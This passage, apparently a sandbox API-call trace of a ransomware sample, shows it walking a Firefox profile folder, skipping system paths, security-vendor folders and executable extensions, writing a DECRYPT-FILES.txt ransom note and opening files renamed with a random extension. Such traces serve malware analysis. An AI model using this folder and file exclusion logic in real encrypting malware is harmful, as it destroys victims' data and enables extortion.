lpSrch=":\\Windows") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Games\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Tor Browser\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\ProgramData\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\All Users") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\IETldCache\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\Local Settings\\") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="\\AppData\\Local") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="AhnLab") returned 0x0 [0183.737] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0183.737] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0183.737] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.737] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\0a16c9.tmp") returned 99 [0183.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0183.772] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0183.772] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0183.772] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\DECRYPT-FILES.txt") returned 106 [0183.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.776] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0183.776] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*" [0183.776] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf03d93e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf03d93e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0183.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0183.776] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf03d93e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf03d93e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0183.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0183.881] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf03d93e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf03d93e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf03d93e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0183.881] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0183.881] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.881] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0183.881] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0183.881] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0183.881] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0183.881] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0183.881] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.881] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0183.882] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\0a16c9.tmp" [0183.882] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.882] CloseHandle (hObject=0x0) returned 0 [0183.882] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.882] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb76a6d10, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb76a6d10, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac3e2b00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="addons.json.VCtDYQF", cAlternateFileName="ADDONS~1.VCT")) returned 1 [0183.882] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="DECRYPT-FILES.txt") returned -1 [0183.882] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="autorun.inf") returned -1 [0183.882] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="boot.ini") returned -1 [0183.882] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="desktop.ini") returned -1 [0183.882] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="ntuser.dat") returned -1 [0183.883] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="iconcache.db") returned -1 [0183.883] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="bootsect.bak") returned -1 [0183.883] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="ntuser.dat.log") returned -1 [0183.883] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="thumbs.db") returned -1 [0183.883] lstrcmpiW (lpString1="addons.json.VCtDYQF", lpString2="Bootfont.bin") returned -1 [0183.883] lstrlenW (lpString="addons.json.VCtDYQF") returned 19 [0183.883] lstrcmpiW (lpString1="VCtDYQF", lpString2="lnk") returned 1 [0183.883] lstrcmpiW (lpString1="VCtDYQF", lpString2="exe") returned 1 [0183.883] lstrcmpiW (lpString1="VCtDYQF", lpString2="sys") returned 1 [0183.883] lstrcmpiW (lpString1="VCtDYQF", lpString2="dll") returned 1 [0183.883] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0183.883] lstrlenW (lpString="addons.json.VCtDYQF") returned 19 [0183.883] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0183.883] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="addons.json.VCtDYQF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.VCtDYQF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.VCtDYQF" [0183.883] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0183.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.VCtDYQF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.vctdyqf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0183.884] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=288) returned 1 [0183.884] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0183.884] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0183.884] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0183.884] CloseHandle (hObject=0x288) returned 1 [0183.884] CloseHandle (hObject=0x284) returned 1 [0183.884] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.884] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac55f8c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac55f8c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bookmarkbackups", cAlternateFileName="BOOKMA~1")) returned 1 [0183.884] lstrcmpW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0183.884] lstrcmpW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0183.885] lstrcatW (in: lpString1="bookmarkbackups", lpString2="\\" | out: lpString1="bookmarkbackups\\") returned="bookmarkbackups\\" [0183.885] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Program Files") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch=":\\Windows") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Games\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Tor Browser\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\ProgramData\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\All Users") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\IETldCache\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\Local Settings\\") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="\\AppData\\Local") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="AhnLab") returned 0x0 [0183.885] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0183.885] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0183.885] lstrlenW (lpString="0a16c9.tmp") returned 10 [0183.885] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\0a16c9.tmp") returned 115 [0183.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0184.008] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0184.008] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0184.008] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\DECRYPT-FILES.txt") returned 122 [0184.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.013] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0184.013] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*" [0184.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0614880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0614880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0184.013] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0184.013] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb5233c30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf0614880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0614880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0184.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0184.014] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0614880, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf0614880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf0614880, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0184.014] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0184.014] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.014] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0184.014] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0184.014] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0184.014] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0184.014] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned 104 [0184.014] lstrlenW (lpString="0a16c9.tmp") returned 10 [0184.014] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\" [0184.015] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\0a16c9.tmp" [0184.015] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.015] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\bookmarkbackups\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\bookmarkbackups\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.015] CloseHandle (hObject=0x0) returned 0 [0184.015] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.015] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc37c9330, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc37c9330, 